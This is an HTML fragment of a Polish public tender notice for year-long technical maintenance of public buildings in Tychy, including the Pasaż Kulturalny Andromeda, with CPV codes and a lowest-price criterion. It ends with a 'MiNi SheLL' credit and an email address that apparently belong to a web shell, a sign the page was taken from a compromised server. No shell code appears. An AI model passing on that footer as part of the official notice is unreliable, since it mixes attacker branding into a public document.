6)	 serwis i obsługę instalacji niskoprądowych (teletechnicznych)
7)	 całodobowe świadczenie czynności pogotowia technicznego
1.1.	Szczegółowy zakres obowiązków na realizację zadania nr 1 zawiera załącznik nr 1 do 
      wzoru umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2  -    Utrzymanie techniczne  budynku użyteczności publicznej
                                       Pasaż Kulturalny Andromeda przy Pl. Baczyńskiego 2 w Tychach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ZAKRES ZAMÓWIENIA DOTYCZĄCY ZADANIA NR 2 OBEJMUJE: 
1)	konserwację wewnętrznych instalacji budowlanych: 
       -   instalacji centralnego ogrzewania
       -   instalacji wodno - kanalizacyjnej i p.poż.
       -   instalacji elektrycznej,
       -   instalacji klimatyzacyjno - wentylacyjnej z instalacją wody lodowej
       -   instalacji p.poż. i systemu oddymiania
       -   instalacji systemu CCTV

       -   serwis i obsługę instalacji niskoprądowych (teletechnicznych)
      2) całodobowe świadczenie czynności pogotowia technicznego
1.Szczegółowy zakres obowiązków na realizację zadania nr 2 zawiera załącznik nr 1 do 
      wzoru umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com